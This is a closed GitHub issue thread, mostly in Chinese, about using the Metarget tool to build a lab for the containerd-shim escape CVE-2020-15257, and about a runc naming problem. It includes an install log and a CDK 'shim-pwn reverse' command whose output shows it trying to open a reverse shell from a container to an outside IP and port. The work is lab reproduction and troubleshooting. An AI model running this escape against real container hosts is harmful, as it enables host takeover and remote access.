Closed duowen1 closed 3 years ago
在Ubuntu18.04和16.04分别搭建过环境,最后结果都下面所示,Linux内核版本是5.8.0-59-generic
sudo ./metarget cnv install cve-2020-15257 --verbose cve-2020-15257 is going to be installed uninstalling current docker gadgets if applicable Reading package lists... Done Building dependency tree Reading state information... Done The following packages were automatically installed and are no longer required: aufs-tools cgroupfs-mount pigz Use 'sudo apt autoremove' to remove them. The following packages will be REMOVED: docker-ce 0 upgraded, 0 newly installed, 1 to remove and 444 not upgraded. After this operation, 181 MB disk space will be freed. (Reading database ... 133309 files and directories currently installed.) Removing docker-ce (18.03.1~ce~3-0~ubuntu) ... Processing triggers for man-db (2.8.3-2ubuntu0.1) ... Reading package lists... Done Building dependency tree Reading state information... Done Package 'docker' is not installed, so not removed The following packages were automatically installed and are no longer required: aufs-tools cgroupfs-mount pigz Use 'sudo apt autoremove' to remove them. 0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded. Reading package lists... Done Building dependency tree Reading state information... Done Package 'docker-engine' is not installed, so not removed The following packages were automatically installed and are no longer required: aufs-tools cgroupfs-mount pigz Use 'sudo apt autoremove' to remove them. 0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded. Reading package lists... Done Building dependency tree Reading state information... Done Package 'docker.io' is not installed, so not removed The following packages were automatically installed and are no longer required: aufs-tools cgroupfs-mount pigz Use 'sudo apt autoremove' to remove them. 0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded. Reading package lists... Done Building dependency tree Reading state information... Done Package 'containerd' is not installed, so not removed The following packages were automatically installed and are no longer required: aufs-tools cgroupfs-mount pigz Use 'sudo apt autoremove' to remove them. 0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded. Reading package lists... Done Building dependency tree Reading state information... Done Package 'runc' is not installed, so not removed The following packages were automatically installed and are no longer required: aufs-tools cgroupfs-mount pigz Use 'sudo apt autoremove' to remove them. 0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded. installing prerequisites Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease Hit:5 http://archive.ubuntu.com/ubuntu xenial-updates InRelease Hit:6 http://archive.ubuntu.com/ubuntu bionic-updates InRelease Hit:7 https://download.docker.com/linux/ubuntu bionic InRelease Reading package lists... Done Reading package lists... Done Building dependency tree Reading state information... Done ca-certificates is already the newest version (20210119~18.04.1). software-properties-common is already the newest version (0.96.24.32.14). apt-transport-https is already the newest version (1.6.13). gnupg-agent is already the newest version (2.2.4-1ubuntu1.4). The following packages were automatically installed and are no longer required: aufs-tools cgroupfs-mount pigz Use 'sudo apt autoremove' to remove them. 0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded. adding apt repository deb [arch=amd64] https://download.docker.com/linux/ubuntu bionic stable OK Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease Hit:5 https://download.docker.com/linux/ubuntu bionic InRelease Hit:6 http://archive.ubuntu.com/ubuntu xenial-updates InRelease Hit:7 http://archive.ubuntu.com/ubuntu bionic-updates InRelease Reading package lists... Done adding apt repository deb http://archive.ubuntu.com/ubuntu xenial-updates universe Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease Hit:5 https://download.docker.com/linux/ubuntu bionic InRelease Hit:6 http://archive.ubuntu.com/ubuntu xenial-updates InRelease Hit:7 http://archive.ubuntu.com/ubuntu bionic-updates InRelease Reading package lists... Done adding apt repository deb http://archive.ubuntu.com/ubuntu bionic-updates universe Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease Hit:5 https://download.docker.com/linux/ubuntu bionic InRelease Hit:6 http://archive.ubuntu.com/ubuntu xenial-updates InRelease Hit:7 http://archive.ubuntu.com/ubuntu bionic-updates InRelease Reading package lists... Done Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease Hit:5 https://download.docker.com/linux/ubuntu bionic InRelease Hit:6 http://archive.ubuntu.com/ubuntu xenial-updates InRelease Hit:7 http://archive.ubuntu.com/ubuntu bionic-updates InRelease Reading package lists... Done installing docker-ce with 18.03.1~ce~3-0~ubuntu version Reading package lists... Done Building dependency tree Reading state information... Done The following NEW packages will be installed: docker-ce 0 upgraded, 1 newly installed, 0 to remove and 444 not upgraded. Need to get 0 B/33.9 MB of archives. After this operation, 181 MB of additional disk space will be used. Selecting previously unselected package docker-ce. (Reading database ... 133095 files and directories currently installed.) Preparing to unpack .../docker-ce_18.03.1~ce~3-0~ubuntu_amd64.deb ... Unpacking docker-ce (18.03.1~ce~3-0~ubuntu) ... Setting up docker-ce (18.03.1~ce~3-0~ubuntu) ... Processing triggers for ureadahead (0.100.0-21) ... Processing triggers for systemd (237-3ubuntu10.24) ... Processing triggers for man-db (2.8.3-2ubuntu0.1) ... warning: no candidate version for containerd warning: docker seems to be installed, but some errors happened during installation cve-2020-15257 successfully installed
安装成功,但是显示有warning
然后按照Writeup的方式去复现,可以找到抽象命名空间的套接字。但是在进行exploit时发现结果如下所示:
root@ubuntu:/tmp# run shim-pwn reverse xx.xx.xx.xx 1234 bash: run: command not found root@ubuntu:/tmp# ./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx 1234 2021/06/28 07:55:31 tring to spawn shell to 49.232.1.8:1234 2021/06/28 07:55:31 try socket: @/containerd-shim/moby/b2d38375588b3b988f9010ce551d785a2bdb37a497aed068c8482b0776af2910/shim.sock 2021/06/28 07:55:31 rpc error response.: rpc error: code = Unknown desc = OCI runtime create failed: exec: "runc": executable file not found in $PATH 2021/06/28 07:55:31 exploit failed.
报错信息显示runc不在PATH路径下,执行runc提示需要安装。发现实际上安装的runc可执行文件为docker-runc,创建软链接后利用成功。
似乎如果系统安装过docker,再利用metarget安装漏洞环境就会导致runc的名称问题。不知道这属不属于bug,或许在writeup上可以做下标注?
docker-runc
,也就是安装docker后自带的一系列docker-
开头的程序(其实后面你能利用成功,也是因为docker-ce
自动安装了docker-containerd
,毕竟Metarget安装containerd失败了)。@duowen1 关于runc和docker-runc的问题,经测试在contrainerd安装成功(cnv install cve-2020-15257)后,runc、docker-runc均存在,路径分别为/usr/sbin/runc和/usr/bin/docker-runc,我这边用CDK去测试反弹shell是没有问题的。
This issue will be closed. However the installation problem of containerd has not been solved perfectly yet. If necessary, someone may reopen this issue and we will talk and figure out how to solve it :p
在Ubuntu18.04和16.04分别搭建过环境,最后结果都下面所示,Linux内核版本是5.8.0-59-generic
安装成功,但是显示有warning
然后按照Writeup的方式去复现,可以找到抽象命名空间的套接字。但是在进行exploit时发现结果如下所示:
报错信息显示runc不在PATH路径下,执行runc提示需要安装。发现实际上安装的runc可执行文件为docker-runc,创建软链接后利用成功。
似乎如果系统安装过docker,再利用metarget安装漏洞环境就会导致runc的名称问题。不知道这属不属于bug,或许在writeup上可以做下标注?